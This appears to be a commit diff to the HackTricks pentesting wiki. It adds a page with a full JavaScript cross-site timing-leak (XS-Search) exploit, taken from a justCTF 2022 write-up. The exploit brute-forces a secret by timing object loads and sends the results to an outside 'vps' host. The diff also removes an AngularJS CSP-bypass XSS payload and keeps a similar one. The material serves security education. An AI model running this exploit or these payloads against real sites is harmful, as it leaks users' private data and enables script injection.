GitBook: [#3730] No subject

Author: carlospolop

SUMMARY.md

@@ -583,6 +583,7 @@
   * [Connection Pool Example](pentesting-web/xs-search/connection-pool-example.md)
   * [Connection Pool by Destination Example](pentesting-web/xs-search/connection-pool-by-destination-example.md)
   * [performance.now example](pentesting-web/xs-search/performance.now-example.md)
+  * [performance.now + Force heavy task](pentesting-web/xs-search/performance.now-+-force-heavy-task.md)
   * [Event Loop Blocking + Lazy images](pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md)
   * [CSS Injection](pentesting-web/xs-search/css-injection/README.md)
     * [CSS Injection Code](pentesting-web/xs-search/css-injection/css-injection-code.md)

pentesting-web/content-security-policy-csp-bypass/README.md

@@ -194,15 +194,6 @@ Load a vulnerable version of angular and execute arbitrary JS:
 
 "><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
 <div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
-
-
-With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/
-<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script>
-<iframe/ng-app/ng-csp/srcdoc="
-  <script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
-  </script>
-  <img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
->
 ```
 
 #### Payloads using Angular + a library with functions that return the `window` object ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):

pentesting-web/xs-search.md

@@ -119,6 +119,14 @@ In this case if `example.com/404` is not found `attacker.com/?error` will be loa
 [performance.now-example.md](xs-search/performance.now-example.md)
 {% endcontent-ref %}
 
+#### Onload Timing + Forced Heavy Task
+
+This technique is just like the previous one, but the **attacker** will also **force** some action to take a **relevant amount time** when the **answer is positive or negative** and measure that time.
+
+{% content-ref url="xs-search/performance.now-+-force-heavy-task.md" %}
+[performance.now-+-force-heavy-task.md](xs-search/performance.now-+-force-heavy-task.md)
+{% endcontent-ref %}
+
 ### unload/beforeunload Timing
 
 * **Inclusion Methods**: Frames

pentesting-web/xs-search/performance.now-+-force-heavy-task.md

@@ -0,0 +1,131 @@
+# performance.now + Force heavy task
+
+<details>
+
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
+
+Exploit taken from [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)
+
+In this challenge the user could sent thousands of chars and if the flag was contained, the chars would be sent back to the bot. So putting a big amount of chars the attacker could measure if the flag was containing in the sent string or not.
+
+{% hint style="warning" %}
+Initially, I didn’t set object width and height, but later on, I found that it’s important because the default size is too small to make a difference in the load time.
+{% endhint %}
+
+```html
+<!DOCTYPE html>
+<html>
+<head>
+
+</head>
+<body>
+  <img src="https://deelay.me/30000/https://example.com">
+    <script>
+      fetch('https://deelay.me/30000/https://example.com')
+
+      function send(data) {
+        fetch('http://vps?data='+encodeURIComponent(data)).catch(err => 1)
+      }
+
+      function leak(char, callback) {
+        return new Promise(resolve => {
+          let ss = 'just_random_string'
+          let url = `http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=`+ss[Math.floor(Math.random()*ss.length)].repeat(1000000)
+          let start = performance.now()
+          let object = document.createElement('object');
+          object.width = '2000px'
+          object.height = '2000px'
+          object.data = url;
+          object.onload = () => {
+            object.remove()
+            let end = performance.now()
+            resolve(end - start)
+          }
+          object.onerror = () => console.log('Error event triggered');
+          document.body.appendChild(object);
+        })
+        
+      }
+
+      send('start')
+
+      let charset = 'abcdefghijklmnopqrstuvwxyz_}'.split('')
+      let flag = 'justCTF{'
+
+      async function main() {
+        let found = 0
+        let notFound = 0
+        for(let i=0;i<3;i++) {
+          await leak('..')
+        }
+        for(let i=0; i<3; i++) {
+          found += await leak('justCTF')
+        }
+        for(let i=0; i<3; i++) {
+          notFound += await leak('NOT_FOUND123')
+        }
+
+        found /= 3
+        notFound /= 3
+        
+        send('found flag:'+found)
+        send('not found flag:'+notFound)
+
+        let threshold = found - ((found - notFound)/2)
+        send('threshold:'+threshold)
+
+        if (notFound > found) {
+          return
+        }
+
+        // exploit
+        while(true) {
+          if (flag[flag.length - 1] === '}') {
+            break
+          }
+          for(let char of charset) {
+            let trying = flag + char
+            let time = 0
+            for(let i=0; i<3; i++) {
+              time += await leak(trying)
+            }
+            time/=3
+            send('char:'+trying+',time:'+time)
+            if (time >= threshold) {
+              flag += char
+              send(flag)
+              break
+            }
+          }
+        }
+      }
+
+      main()
+      
+    </script>
+</body>
+
+</html>
+```
+
+
+
+<details>
+
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>